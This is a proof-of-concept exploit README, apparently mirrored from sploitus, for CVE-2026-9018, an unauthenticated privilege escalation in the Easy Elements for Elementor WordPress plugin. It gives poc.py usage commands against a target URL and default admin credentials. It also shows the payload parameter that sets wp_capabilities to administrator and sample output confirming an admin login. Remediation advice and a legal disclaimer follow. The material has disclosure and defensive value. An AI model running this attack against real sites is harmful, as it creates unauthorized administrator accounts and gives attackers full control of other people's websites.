Share
## https://sploitus.com/exploit?id=BC1D8C43-7174-5774-8282-A8C6F19DE6FC
# CVE-2026-9018
# CVE-2026-9018 โ€” Easy Elements for Elementor โ‰ค 1.4.5 | Unauthenticated Privilege Escalation

![CVE](https://img.shields.io/badge/CVE-2026--9018-critical?style=flat-square&color=red)
![CVSS](https://img.shields.io/badge/CVSS-8.8-high?style=flat-square&color=orange)
![CWE](https://img.shields.io/badge/CWE-269-orange?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-red?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.10%2B-blue?style=flat-square)

> **Research by:** [Atomic Edge](https://atomicedge.io)
> **Severity:** High | **CVSS:** 8.8 | **Auth Required:** None

---

## Overview

An unauthenticated privilege escalation vulnerability exists in the **Easy Elements for Elementor โ€“ Addons & Website Templates** WordPress plugin (versions โ‰ค 1.4.5). The `easyel_handle_register()` function, exposed via the `wp_ajax_nopriv_eel_register` AJAX handler, passes attacker-controlled `custom_meta` POST values directly to `update_user_meta()` without any key whitelist. This allows an unauthenticated attacker to overwrite the `wp_capabilities` meta key and create an **administrator-level account**.

| Property        | Detail                                                                 |
|-----------------|------------------------------------------------------------------------|
| **Plugin**      | Easy Elements for Elementor โ€“ Addons & Website Templates (easy-elements) |
| **Affected**    | โ‰ค 1.4.5                                                                |
| **Fixed In**    | 1.4.6+                                                                 |
| **Vector**      | Network / Unauthenticated                                              |
| **CWE**         | CWE-269: Improper Privilege Management                                 |
| **AJAX Action** | `eel_register` (nopriv)                                                |

---

## Prerequisites

Before exploitation, the following conditions must be met on the target site:

- โœ… WordPress **user registration is enabled** (`Settings โ†’ General โ†’ Anyone can register`)
- โœ… A page with the plugin's **Login/Register widget** is publicly accessible
- โœ… The widget exposes the `easy_elements_nonce` value in the page DOM

---

## Requirements

```bash
pip install requests
```

---

## Usage

```bash
# Basic โ€” nonce fetched from homepage
python3 poc.py -u https://target.com

# Custom credentials
python3 poc.py -u https://target.com -U hacker -e h@x.io -p P@ssw0rd!

# Widget is on /login/ page
python3 poc.py -u https://target.com --nonce-page /login/

# Skip SSL verification
python3 poc.py -u https://target.com --no-verify

# Skip post-exploit login check
python3 poc.py -u https://target.com --skip-verify-login
```

### Arguments

| Flag                   | Description                                          | Default            |
|------------------------|------------------------------------------------------|--------------------|
| `-u`, `--url`          | Target WordPress URL                                 | *(required)*       |
| `-U`, `--username`     | Username for the new admin account                   | `atomic_admin`     |
| `-e`, `--email`        | Email for the new admin account                      | `admin@atomicedge.io` |
| `-p`, `--password`     | Password for the new admin account                   | `Atomic@Edge2026!` |
| `-np`, `--nonce-page`  | Page path containing the Login/Register widget       | `/`                |
| `--no-verify`          | Disable SSL certificate verification                 | `false`            |
| `--skip-verify-login`  | Skip post-exploit WP admin login verification        | `false`            |

### Example Output

```
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : admin@atomicedge.io
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[โœ“] Privilege escalation payload accepted!
[โœ“] Admin login CONFIRMED!

    โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
    โ”‚  WP Admin  : https://target.com/wp-admin/
    โ”‚  Username  : atomic_admin
    โ”‚  Password  : Atomic@Edge2026!
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## Technical Details

The exploit follows a two-step process:

**Step 1 โ€” Nonce Harvesting**
The plugin's Login/Register Elementor widget renders a hidden `easy_elements_nonce` field in the page HTML. This nonce is publicly accessible to any unauthenticated visitor and is extracted via regex from the page source.

**Step 2 โ€” Malicious Registration**
A POST request is sent to `/wp-admin/admin-ajax.php` with `action=eel_register`. The `custom_meta` array is crafted to include:

```
custom_meta[wp_capabilities][administrator] = 1
```

Because `easyel_handle_register()` passes all `custom_meta` keys directly to `update_user_meta()` without a whitelist, the `wp_capabilities` user meta is overwritten post-registration, granting the new user full administrator privileges.

---

## Remediation

Developers must apply the following fixes to `easyel_handle_register()`:

1. **Implement a strict whitelist** of allowed `custom_meta` keys (e.g., `first_name`, `last_name`, `phone`)
2. **Explicitly block** sensitive keys: `wp_capabilities`, `wp_user_level`, `session_tokens`
3. **Avoid processing** any user-supplied meta after `wp_insert_user()` entirely if not required
4. Input sanitization alone is **insufficient** โ€” a whitelist is mandatory

**โ†’ Update to Easy Elements for Elementor 1.4.6 or later immediately.**

---

## Disclaimer

> This repository is intended for **authorized security research and educational purposes only**.
> Do not use this tool against any system without **explicit written permission** from the system owner.
> Unauthorized use may violate the CFAA (USA), Criminal Code s.342.1 (Canada), EU NIS2 Directive, and other applicable laws.
> The authors accept **no liability** for misuse or damages arising from this code.